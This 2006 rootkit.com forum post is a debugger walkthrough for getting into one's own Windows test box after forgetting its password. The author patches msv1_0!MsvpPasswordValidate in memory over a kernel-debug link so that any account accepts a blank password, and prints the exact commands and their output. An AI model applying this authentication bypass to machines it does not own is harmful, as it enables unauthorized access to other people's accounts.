Bypassing your testbox's login password @      Aug 10 2006, 16:21 (UTC+0) bugcheck writes: After living out of a duffle bang for 2 months now i've finally got all my stuff back and have settled into a new apartment and finally have dev PC's again, W00h00! So this isnt the first have had to do this to recover an install with a forgotten password but figured id share it incase you are able to take advantage of it (thx to a friend for pointing out what function did the trick). As stupid as I am I always pick those unique but easy to remember passwords that of course ill never forget, use it once and shelf the image for months at a time and then of course, forget it. In my case today its my dev box!!! Luckly i had been using it as a test machine when i first got it so i happened to already have a boot.ini entry to kernel debug on 1394 and of course had my laptop handy. I know there are better ways to recover a forgotten password but of course its not as cool as this! =P It doesnt reset it but at least you can log in again... Happy debugging, Chris kd> !process 0 0 winlogon.exe PROCESS 817bb978 SessionId: 0 Cid: 0260 Peb: 7ffdc000 ParentCid: 0168 DirBase: 05e40060 ObjectTable: e148a858 HandleCount: 455. Image: winlogon.exe kd> .process /p /r 817bb978 Implicit process is now 817bb978 .cache forcedecodeuser done Loading User Symbols ................................................... kd> u msv1_0!MsvpPasswordValidate l3 msv1_0!MsvpPasswordValidate: 77c79927 ?? ^ Memory access error in 'u msv1_0!MsvpPasswordValidate l3' kd> .pagein msv1_0!MsvpPasswordValidate You need to continue execution (press 'g' ) for the pagein to be brought in. When the debugger breaks in again, the page will be present. kd> g Break instruction exception - code 80000003 (first chance) nt!RtlpBreakWithStatusInstruction: 80526da8 cc int 3 kd> u msv1_0!MsvpPasswordValidate l3 msv1_0!MsvpPasswordValidate: 77c79927 8bff mov edi,edi 77c79929 55 push ebp 77c7992a 8bec mov ebp,esp kd> eq msv1_0!MsvpPasswordValidate cccc000cc201b0 kd> u msv1_0!MsvpPasswordValidate l3 msv1_0!MsvpPasswordValidate: 77c79927 b001 mov al,0x1 77c79929 c20c00 ret 0xc 77c7992c cc int 3 kd> ** YOU CAN NOW LOGIN WITH A BLANK PASSWORD! kd> ** DONT BE SCREWIN WITH YOUR CO-WORKERS NOW =p kd> g

(c) www.rootkit.com / http://www.rootkit.com/